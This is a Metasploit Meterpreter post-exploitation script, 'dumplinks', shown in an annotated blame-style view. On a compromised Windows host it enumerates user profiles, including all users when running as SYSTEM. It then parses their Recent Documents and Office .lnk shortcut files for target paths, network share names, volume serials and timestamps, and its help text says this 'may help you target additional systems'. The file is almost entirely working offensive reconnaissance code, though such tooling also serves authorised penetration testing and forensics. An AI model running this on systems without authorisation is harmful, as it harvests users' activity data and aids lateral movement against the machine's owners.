2010-03-12 02:01:15 +00:00
|
|
|
# $Id$
|
2010-06-23 00:50:14 +00:00
|
|
|
# $Revision$
|
|
|
|
# Author: davehull at dph_msf@trustedsignal.com
|
|
|
|
#-------------------------------------------------------------------------------
|
2010-03-12 02:01:15 +00:00
|
|
|
|
|
|
|
opts = Rex::Parser::Arguments.new(
|
|
|
|
"-h" => [ false, "Help menu." ],
|
|
|
|
"-e" => [ false, "Dump everything for each link file." ],
|
|
|
|
"-w" => [ false, "Redirect output to file."]
|
|
|
|
)
|
|
|
|
|
|
|
|
@everything, @output_dir, @data_out = nil
|
|
|
|
opts.parse(args) { |opt, idx, val|
|
|
|
|
case opt
|
|
|
|
when '-e'
|
|
|
|
@everything = true
|
|
|
|
when '-w'
|
2010-06-23 00:50:14 +00:00
|
|
|
@output_dir = ::File.join(Msf::Config.log_directory,'scripts', 'dumplinks')
|
2010-03-12 02:01:15 +00:00
|
|
|
when "-h"
|
|
|
|
print_line "dumplinks -- parse .lnk files from user's Recent Documents"
|
|
|
|
print_line
|
|
|
|
print_line "dumplinks is a modified port of Harlan Carvey's lslnk.pl Perl script."
|
|
|
|
print_line "dumplinks parses .lnk files from a user's Recent documents folder and"
|
|
|
|
print_line "Microsoft Office's Recent documents folder, if present. Windows creates"
|
|
|
|
print_line "these link files automatically for many common file types."
|
|
|
|
print_line
|
|
|
|
print_line "\tResults are saved to #{::File.join(Msf::Config.log_directory, 'dumplinks')} if -w is used."
|
|
|
|
print_line
|
|
|
|
print_line "The .lnk files contain time stamps, file locations, including share"
|
|
|
|
print_line "names, volume serial #s and more. This info may help you target"
|
|
|
|
print_line "additional systems."
|
|
|
|
print_line
|
|
|
|
print_line "By default, dumplinks only returns the destination for the shortcut."
|
|
|
|
print_line "See the available arguments for other options."
|
|
|
|
print_line (opts.usage)
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
|
|
|
}
|
|
|
|
|
|
|
|
# ----------------------------------------------------------------
|
|
|
|
# Set up the environment
|
|
|
|
@client = client
|
|
|
|
info = @client.sys.config.sysinfo
|
|
|
|
os = @client.sys.config.sysinfo['OS']
|
|
|
|
|
|
|
|
if @output_dir
|
|
|
|
# Create filename info to be appended to downloaded files
|
|
|
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d")
|
|
|
|
|
|
|
|
# Create a directory for the output
|
|
|
|
@logs = ::File.join(@output_dir, info['Computer'] + filenameinfo)
|
|
|
|
|
|
|
|
# Create output directory
|
|
|
|
::FileUtils.mkdir_p(@logs)
|
|
|
|
end
|
|
|
|
# ---------------------------------------------------------------
|
|
|
|
|
|
|
|
# Function for enumerating users if running as SYSTEM
|
|
|
|
# Borrowed from get_pidgin_creds
|
|
|
|
def enum_users(os)
|
|
|
|
users = []
|
|
|
|
userinfo = {}
|
|
|
|
user = @client.sys.config.getuid
|
|
|
|
userpath = nil
|
|
|
|
useroffcpath = nil
|
|
|
|
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
|
|
|
if os =~ /7|Vista|2008/
|
|
|
|
userpath = sysdrv + "\\Users\\"
|
|
|
|
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
|
|
|
|
officelnkpath = "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\"
|
|
|
|
else
|
|
|
|
userpath = sysdrv + "\\Documents and Settings\\"
|
|
|
|
lnkpath = "\\Recent\\"
|
|
|
|
officelnkpath = "\\Application Data\\Microsoft\\Office\\Recent\\"
|
|
|
|
end
|
|
|
|
if user == "NT AUTHORITY\\SYSTEM"
|
|
|
|
print_status("Running as SYSTEM extracting user list...")
|
|
|
|
@client.fs.dir.foreach(userpath) do |u|
|
|
|
|
next if u =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini)$/
|
|
|
|
userinfo['username'] = u
|
|
|
|
userinfo['userpath'] = userpath + u + lnkpath
|
|
|
|
userinfo['useroffcpath'] = userpath + u + officelnkpath
|
|
|
|
userinfo['userpath'] = dir_entry_exists(userinfo['userpath'])
|
|
|
|
userinfo['useroffcpath'] = dir_entry_exists(userinfo['useroffcpath'])
|
|
|
|
users << userinfo
|
|
|
|
end
|
|
|
|
else
|
|
|
|
uservar = @client.fs.file.expand_path("%USERNAME%")
|
|
|
|
userinfo['username'] = uservar
|
|
|
|
userinfo['userpath'] = userpath + uservar + lnkpath
|
|
|
|
userinfo['useroffcpath'] = userpath + uservar + officelnkpath
|
|
|
|
userinfo['userpath'] = dir_entry_exists(userinfo['userpath'])
|
|
|
|
userinfo['useroffcpath'] = dir_entry_exists(userinfo['useroffcpath'])
|
|
|
|
users << userinfo
|
|
|
|
end
|
|
|
|
return users
|
|
|
|
end
|
|
|
|
|
|
|
|
# This is a hack because meterpreter doesn't support exists?(file)
|
|
|
|
def dir_entry_exists(path)
|
|
|
|
files = @client.fs.dir.entries(path)
|
|
|
|
rescue
|
|
|
|
return nil
|
|
|
|
else
|
|
|
|
return path
|
|
|
|
end
|
|
|
|
|
|
|
|
def extract_lnk_info(path)
|
|
|
|
@client.fs.dir.foreach(path) do |file_name|
|
|
|
|
if file_name =~ /\.lnk$/ # We have a .lnk file
|
|
|
|
record = nil
|
|
|
|
offset = 0 # ToDo: Look at moving this to smaller scope
|
|
|
|
lnk_file = @client.fs.file.new(path + file_name, "rb")
|
|
|
|
record = lnk_file.sysread(0x04)
|
|
|
|
if record.unpack('V')[0] == 76 # We have a .lnk file signature
|
|
|
|
file_stat = @client.fs.filestat.new(path + file_name)
|
|
|
|
print_status "Processing: #{path + file_name}."
|
|
|
|
@data_out = ""
|
|
|
|
|
|
|
|
record = lnk_file.sysread(0x48)
|
|
|
|
hdr = get_headers(record)
|
|
|
|
|
|
|
|
if @everything
|
|
|
|
@data_out += get_lnk_file_MAC(file_stat, path, file_name)
|
|
|
|
@data_out += "Contents of #{path + file_name}:\n"
|
|
|
|
@data_out += get_flags(hdr)
|
|
|
|
@data_out += get_attrs(hdr)
|
|
|
|
@data_out += get_lnk_MAC(hdr)
|
|
|
|
@data_out += get_showwnd(hdr)
|
|
|
|
@data_out += get_lnk_MAC(hdr)
|
|
|
|
end
|
|
|
|
if shell_item_id_list(hdr)
|
|
|
|
# advance the file & offset
|
|
|
|
offset += 0x4c
|
|
|
|
lnk_file.sysseek(offset, ::IO::SEEK_SET)
|
|
|
|
record = lnk_file.sysread(2)
|
|
|
|
offset += record.unpack('v')[0] + 2
|
|
|
|
end
|
|
|
|
# Get File Location Info
|
|
|
|
if (hdr["flags"] & 0x02) > 0
|
|
|
|
lnk_file.sysseek(offset, ::IO::SEEK_SET)
|
|
|
|
record = lnk_file.sysread(4)
|
|
|
|
tmp = record.unpack('V')[0]
|
|
|
|
if tmp > 0
|
|
|
|
lnk_file.sysseek(offset, ::IO::SEEK_SET)
|
|
|
|
record = lnk_file.sysread(0x1c)
|
|
|
|
loc = get_file_location(record)
|
|
|
|
if (loc['flags'] & 0x01) > 0
|
|
|
|
if @everything
|
|
|
|
@data_out += "\tShortcut file is on a local volume.\n"
|
|
|
|
end
|
|
|
|
lnk_file.sysseek(offset + loc['vol_ofs'], ::IO::SEEK_SET)
|
|
|
|
record = lnk_file.sysread(0x10)
|
|
|
|
lvt = get_local_vol_tbl(record)
|
|
|
|
lvt['name'] = lnk_file.sysread(lvt['len'] - 0x10)
|
|
|
|
if @everything
|
|
|
|
@data_out += "\t\tVolume Name = #{lvt['name']}\n" +
|
|
|
|
"\t\tVolume Type = #{get_vol_type(lvt['type'])}\n" +
|
|
|
|
"\t\tVolume SN = 0x%X" % lvt['vol_sn'] + "\n"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
if (loc['flags'] & 0x02) > 0
|
|
|
|
if @everything
|
|
|
|
@data_out += "\tFile is on a network share.\n"
|
|
|
|
end
|
|
|
|
lnk_file.sysseek(offset + loc['network_ofs'], ::IO::SEEK_SET)
|
|
|
|
record = lnk_file.sysread(0x14)
|
|
|
|
nvt = get_net_vol_tbl(record)
|
|
|
|
nvt['name'] = lnk_file.sysread(nvt['len'] - 0x14)
|
|
|
|
if @everything
|
|
|
|
@data_out += "\tNetwork Share name = #{nvt['name']}\n"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
if loc['base_ofs'] > 0
|
|
|
|
@data_out += get_target_path(loc['base_ofs'] + offset, lnk_file)
|
|
|
|
elsif loc['path_ofs'] > 0
|
|
|
|
@data_out += get_target_path(loc['path_ofs'] + offset, lnk_file)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
lnk_file.close
|
|
|
|
if @output_dir
|
|
|
|
@file_out_name = @logs + "/" + file_name + ".txt"
|
|
|
|
print_status "Writing: #{@file_out_name}"
|
|
|
|
filewrt(@file_out_name, @data_out)
|
|
|
|
else
|
|
|
|
print_status @data_out
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# Not only is this code slow, it seems
|
|
|
|
# buggy. I'm studying the recently released
|
|
|
|
# MS Specs for a better way.
|
|
|
|
def get_target_path(path_ofs, lnk_file)
|
|
|
|
name = []
|
|
|
|
lnk_file.sysseek(path_ofs, ::IO::SEEK_SET)
|
|
|
|
record = lnk_file.sysread(2)
|
|
|
|
while (record.unpack('v')[0] != 0)
|
|
|
|
name.push(record)
|
|
|
|
record = lnk_file.sysread(2)
|
|
|
|
end
|
|
|
|
return "\tTarget path = #{name.join}\n"
|
|
|
|
end
|
|
|
|
|
|
|
|
def shell_item_id_list(hdr)
|
|
|
|
# Check for Shell Item ID List
|
|
|
|
if (hdr["flags"] & 0x01) > 0
|
|
|
|
return true
|
|
|
|
else
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_lnk_file_MAC(file_stat, path, file_name)
|
|
|
|
data_out = "#{path + file_name}:\n"
|
|
|
|
data_out += "\tAccess Time = #{file_stat.atime}\n"
|
|
|
|
data_out += "\tCreation Date = #{file_stat.ctime}\n"
|
|
|
|
data_out += "\tModification Time = #{file_stat.mtime}\n"
|
|
|
|
return data_out
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_vol_type(type)
|
|
|
|
vol_type = { 0 => "Unknown",
|
|
|
|
1 => "No root directory",
|
|
|
|
2 => "Removable",
|
|
|
|
3 => "Fixed",
|
|
|
|
4 => "Remote",
|
|
|
|
5 => "CD-ROM",
|
|
|
|
6 => "RAM Drive"}
|
|
|
|
return vol_type[type]
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_showwnd(hdr)
|
|
|
|
showwnd = { 0 => "SW_HIDE",
|
|
|
|
1 => "SW_NORMAL",
|
|
|
|
2 => "SW_SHOWMINIMIZED",
|
|
|
|
3 => "SW_SHOWMAXIMIZED",
|
|
|
|
4 => "SW_SHOWNOACTIVE",
|
|
|
|
5 => "SW_SHOW",
|
|
|
|
6 => "SW_MINIMIZE",
|
|
|
|
7 => "SW_SHOWMINNOACTIVE",
|
|
|
|
8 => "SW_SHOWNA",
|
|
|
|
9 => "SW_RESTORE",
|
|
|
|
10 => "SHOWDEFAULT"}
|
|
|
|
data_out = "\tShowWnd value(s):\n"
|
|
|
|
showwnd.each do |key, value|
|
|
|
|
if (hdr["showwnd"] & key) > 0
|
|
|
|
data_out += "\t\t#{showwnd[key]}.\n"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return data_out
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_lnk_MAC(hdr)
|
|
|
|
data_out = "\tTarget file's MAC Times stored in lnk file:\n"
|
|
|
|
data_out += "\t\tCreation Time = #{Time.at(hdr["ctime"])}. (UTC)\n"
|
|
|
|
data_out += "\t\tModification Time = #{Time.at(hdr["mtime"])}. (UTC)\n"
|
|
|
|
data_out += "\t\tAccess Time = #{Time.at(hdr["atime"])}. (UTC)\n"
|
|
|
|
return data_out
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_attrs(hdr)
|
|
|
|
fileattr = {0x01 => "Target is read only",
|
|
|
|
0x02 => "Target is hidden",
|
|
|
|
0x04 => "Target is a system file",
|
|
|
|
0x08 => "Target is a volume label",
|
|
|
|
0x10 => "Target is a directory",
|
|
|
|
0x20 => "Target was modified since last backup",
|
|
|
|
0x40 => "Target is encrypted",
|
|
|
|
0x80 => "Target is normal",
|
|
|
|
0x100 => "Target is temporary",
|
|
|
|
0x200 => "Target is a sparse file",
|
|
|
|
0x400 => "Target has a reparse point",
|
|
|
|
0x800 => "Target is compressed",
|
|
|
|
0x1000 => "Target is offline"}
|
|
|
|
data_out = "\tAttributes:\n"
|
|
|
|
fileattr.each do |key, attr|
|
|
|
|
if (hdr["attr"] & key) > 0
|
|
|
|
data_out += "\t\t#{fileattr[key]}.\n"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return data_out
|
|
|
|
end
|
|
|
|
|
|
|
|
# Function for writing results of other functions to a file
|
|
|
|
def filewrt(file2wrt, data2wrt)
|
|
|
|
output = ::File.open(file2wrt, "a")
|
|
|
|
if data2wrt
|
|
|
|
data2wrt.each_line do |d|
|
|
|
|
output.puts(d)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
output.close
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_flags(hdr)
|
|
|
|
flags = {0x01 => "Shell Item ID List exists",
|
|
|
|
0x02 => "Shortcut points to a file or directory",
|
|
|
|
0x04 => "The shortcut has a descriptive string",
|
|
|
|
0x08 => "The shortcut has a relative path string",
|
|
|
|
0x10 => "The shortcut has working directory",
|
|
|
|
0x20 => "The shortcut has command line arguments",
|
|
|
|
0x40 => "The shortcut has a custom icon"}
|
|
|
|
data_out = "\tFlags:\n"
|
|
|
|
flags.each do |key, flag|
|
|
|
|
if (hdr["flags"] & key) > 0
|
|
|
|
data_out += "\t\t#{flags[key]}.\n"
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return data_out
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_headers(record)
|
|
|
|
hd = record.unpack('x16V12x8')
|
|
|
|
hdr = Hash.new()
|
|
|
|
hdr["flags"] = hd[0]
|
|
|
|
hdr["attr"] = hd[1]
|
|
|
|
hdr["ctime"] = get_time(hd[2], hd[3])
|
|
|
|
hdr["mtime"] = get_time(hd[4], hd[5])
|
|
|
|
hdr["atime"] = get_time(hd[6], hd[7])
|
|
|
|
hdr["length"] = hd[8]
|
|
|
|
hdr["icon_num"] = hd[9]
|
|
|
|
hdr["showwnd"] = hd[10]
|
|
|
|
hdr["hotkey"] = hd[11]
|
|
|
|
return hdr
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_net_vol_tbl(file_net_rec)
|
|
|
|
nv = Hash.new()
|
|
|
|
(nv['len'], nv['ofs']) = file_net_rec.unpack("Vx4Vx8")
|
|
|
|
return nv
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_local_vol_tbl(lvt_rec)
|
|
|
|
lv = Hash.new()
|
|
|
|
(lv['len'], lv['type'], lv['vol_sn'], lv['ofs']) = lvt_rec.unpack('V4')
|
|
|
|
return lv
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_file_location(file_loc_rec)
|
|
|
|
location = Hash.new()
|
|
|
|
(location["len"], location["ptr"], location["flags"],
|
|
|
|
location["vol_ofs"], location["base_ofs"], location["network_ofs"],
|
|
|
|
location["path_ofs"]) = file_loc_rec.unpack('V7')
|
|
|
|
return location
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_time(lo_byte, hi_byte)
|
|
|
|
if (lo_byte == 0 && hi_byte == 0)
|
|
|
|
return 0
|
|
|
|
else
|
|
|
|
lo_byte -= 0xd53e8000
|
|
|
|
hi_byte -= 0x019db1de
|
|
|
|
time = (hi_byte * 429.4967296 + lo_byte/1e7).to_i
|
|
|
|
if time < 0
|
|
|
|
return 0
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return time
|
|
|
|
end
|
|
|
|
|
|
|
|
enum_users(os).each do |user|
|
|
|
|
if user['userpath']
|
|
|
|
print_status "Extracting lnk files for user #{user['username']} at #{user['userpath']}..."
|
|
|
|
extract_lnk_info(user['userpath'])
|
|
|
|
else
|
|
|
|
print_status "No Recent directory found for user #{user['username']}. Nothing to do."
|
|
|
|
end
|
|
|
|
if user['useroffcpath']
|
|
|
|
print_status "Extracting lnk files for user #{user['username']} at #{user['useroffcpath']}..."
|
|
|
|
extract_lnk_info(user['useroffcpath'])
|
|
|
|
else
|
|
|
|
print_status "No Recent Office files found for user #{user['username']}. Nothing to do."
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|